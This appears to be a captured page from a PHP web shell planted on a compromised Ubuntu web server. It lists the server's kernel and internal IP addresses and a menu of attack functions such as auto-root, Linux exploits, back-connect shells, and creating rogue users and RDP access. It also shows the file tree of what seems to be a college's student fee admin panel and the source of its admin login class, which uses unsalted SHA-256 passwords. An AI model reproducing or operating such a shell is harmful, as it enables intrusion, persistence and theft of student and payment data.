Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
conreg /
admin /
[ HOME SHELL ]
Name
Size
Permission
Action
dist
[ DIR ]
drwxr-xr-x
lib
[ DIR ]
drwxr-xr-x
mailer
[ DIR ]
drwxr-xr-x
adAdminUser.php
7.42
KB
-rw-r--r--
adminDashboard-old.php
5.95
KB
-rw-r--r--
adminDashboard.php
26.61
KB
-rw-r--r--
adminDashboardaug22.php
7.32
KB
-rw-r--r--
adminDashboardjan22.php
6.51
KB
-rw-r--r--
batch.php
344
B
-rw-r--r--
changePassword.php
4.61
KB
-rw-r--r--
class.admin.php
4.23
KB
-rw-r--r--
common.php
2.28
KB
-rw-r--r--
dbconfig.php
1.31
KB
-rw-r--r--
delete_member.php
446
B
-rw-r--r--
delete_memberD.php
456
B
-rw-r--r--
error_log
2.03
KB
-rw-r--r--
exportHostelFee.php
1.17
KB
-rw-r--r--
exportStudentApplicatonDetails...
2.64
KB
-rw-r--r--
exportStudentDetails.php
976
B
-rw-r--r--
exportStudentDetailsaug22.php
0
B
-rw-r--r--
exportStudentDetailsjan22.php
754
B
-rw-r--r--
exportTutionFee.php
1.22
KB
-rw-r--r--
exportTutionFeeSearch.php
1.22
KB
-rw-r--r--
exportcseduApplicatonDetails.p...
1.08
KB
-rw-r--r--
exportcseduApplicatonDetailsau...
1.09
KB
-rw-r--r--
exportcseduApplicatonDetailsja...
1.09
KB
-rw-r--r--
exportcseduFeeDetails.php
817
B
-rw-r--r--
exportcseduFeeDetailsaug22.php
830
B
-rw-r--r--
exportcseduFeeDetailsjan22.php
830
B
-rw-r--r--
forgotPassword.php
6.53
KB
-rw-r--r--
fpass.php
2.97
KB
-rw-r--r--
index.php
4.83
KB
-rw-r--r--
invoice.php
5.78
KB
-rw-r--r--
invoiceHostel.php
4.9
KB
-rw-r--r--
jquery.tableToExcel.js
2.76
KB
-rw-r--r--
logout.php
600
B
-rw-r--r--
register.php
6.62
KB
-rw-r--r--
resetpass.php
5.09
KB
-rw-r--r--
tutionFee.php
19.89
KB
-rw-r--r--
updateBatch.php
5.9
KB
-rw-r--r--
updateBatchFee.php
7.1
KB
-rw-r--r--
updateFeeDate.php
9.87
KB
-rw-r--r--
verify.php
2.46
KB
-rw-r--r--
viewApplicationDetailsaug22.ph...
6.18
KB
-rw-r--r--
viewApplicationDetailsjan22.ph...
6.18
KB
-rw-r--r--
viewApplicatonDetails.php
6.16
KB
-rw-r--r--
viewHostelFee.php
9.22
KB
-rw-r--r--
viewPaymentDetails.php
4.86
KB
-rw-r--r--
viewPaymentDetailsaug22.php
4.89
KB
-rw-r--r--
viewPaymentDetailsjan22.php
4.91
KB
-rw-r--r--
viewStudentDetails-old.php
13.75
KB
-rw-r--r--
viewStudentDetails.php
20.86
KB
-rw-r--r--
viewTutionFee.php
9.46
KB
-rw-r--r--
viewapplications.php
13.75
KB
-rw-r--r--
viewapplicationsjan22.php
14.1
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : class.admin.php
<?php require_once 'dbconfig.php'; class ADMIN { private $conn; public function __construct() { $database = new Database(); $db = $database->dbConnection(); $this->conn = $db; } public function runQuery($sql) { $stmt = $this->conn->prepare($sql); return $stmt; } public function lasdID() { $stmt = $this->conn->lastInsertId(); return $stmt; } public function register($adName,$adEmail,$adMobile,$password,$tokenCode) { try { $upassword =hash('sha256',$password); $stmt = $this->conn->prepare("INSERT INTO adminlogin(adName,adEmail,adMobile,adPassword,tokenCode) VALUES(:adName1, :adEmail1, :adMobile1,:upassword1, :tokenCode1)"); $stmt->bindparam(":adName1",$adName); $stmt->bindparam(":adEmail1",$adEmail); $stmt->bindparam(":adMobile1",$adMobile); $stmt->bindparam(":upassword1",$upassword); $stmt->bindparam(":tokenCode1",$tokenCode); $stmt->execute(); return $stmt; } catch(PDOException $ex) { echo $ex->getMessage(); } } public function adminLogin($email,$upass,$authtokenid) { try { $stmt = $this->conn->prepare("SELECT * FROM adminlogin WHERE adEmail=:email_id"); $stmt->execute(array(":email_id"=>$email)); $userRow=$stmt->fetch(PDO::FETCH_ASSOC); $adID = $userRow[ 'adID' ]; if($stmt->rowCount() == 1) { if($userRow['userStatus']=="Y") { if($userRow['adPassword']==hash('sha256',$upass)) { $stmt3 = $this->conn->prepare( "SELECT * FROM authsession WHERE studentID=:adID" ); $stmt3->execute( array( ":adID" => $adID ) ); $userRow3 = $stmt3->fetch( PDO::FETCH_ASSOC ); $loginFlg = "Y"; if ( $userRow3[ 'studentID' ] == "" && $userRow3[ 'authtokenid' ] == "" ) { $stmt4 = $this->conn->prepare( 'INSERT INTO authsession (studentID,authtokenid,loginFlg) VALUES(:adID1, :authtokenid1, :loginFlg1)' ); $stmt4->bindParam( ':adID1', $adID ); $stmt4->bindParam( ':authtokenid1', $authtokenid ); $stmt4->bindParam( ':loginFlg1', $loginFlg ); if ( $stmt4->execute() ) { $_SESSION['adminSession'] = $userRow['adID']; $_SESSION[ 'adID' ] = $userRow3[ 'studentID' ]; return true; } else { //$_SESSION['errMSG']= $errMSG = "error while inserting...."; } } else { $sql = "UPDATE authsession SET authtokenid=:authtokenid, loginFlg=:loginFlg WHERE studentID=:adID"; $query = $this->conn->prepare( $sql ); $query->bindparam( ':adID', $adID ); $query->bindparam( ':authtokenid', $authtokenid ); $query->bindparam( ':loginFlg', $loginFlg ); if ( $query->execute() ) { $_SESSION['adminSession'] = $userRow['adID']; $_SESSION[ 'adID' ] = $userRow3[ 'studentID' ]; return true; } else { //$_SESSION['errMSG']= $errMSG = "error while inserting...."; } } } else { header("Location: index.php?error"); exit; } } else { header("Location: index.php?inactive"); exit; } } else { header("Location: index.php?error"); exit; } } catch(PDOException $ex) { echo $ex->getMessage(); } } public function is_adlogged_in() { if(isset($_SESSION['adminSession'])) { return true; } } public function redirect($url) { header("Location: $url"); } public function adminLogout() { session_destroy(); $_SESSION['adminSession'] = false; $_SESSION[ 'adID' ] = false; } function send_mail($email,$message,$subject) { require_once('mailer/class.phpmailer.php'); $mail = new PHPMailer(); $mail->IsSMTP(); $mail->SMTPDebug = 0; $mail->SMTPAuth = true; $mail->SMTPSecure = "ssl"; $mail->Host = "smtp.gmail.com"; $mail->Port = 465; $mail->AddAddress($email); $mail->Username="your_gmail_id_here@gmail.com"; $mail->Password="your_gmail_password_here"; $mail->SetFrom('your_gmail_id_here@gmail.com','Coding Cage'); $mail->AddReplyTo("your_gmail_id_here@gmail.com","Coding Cage"); $mail->Subject = $subject; $mail->MsgHTML($message); $mail->Send(); } }
Close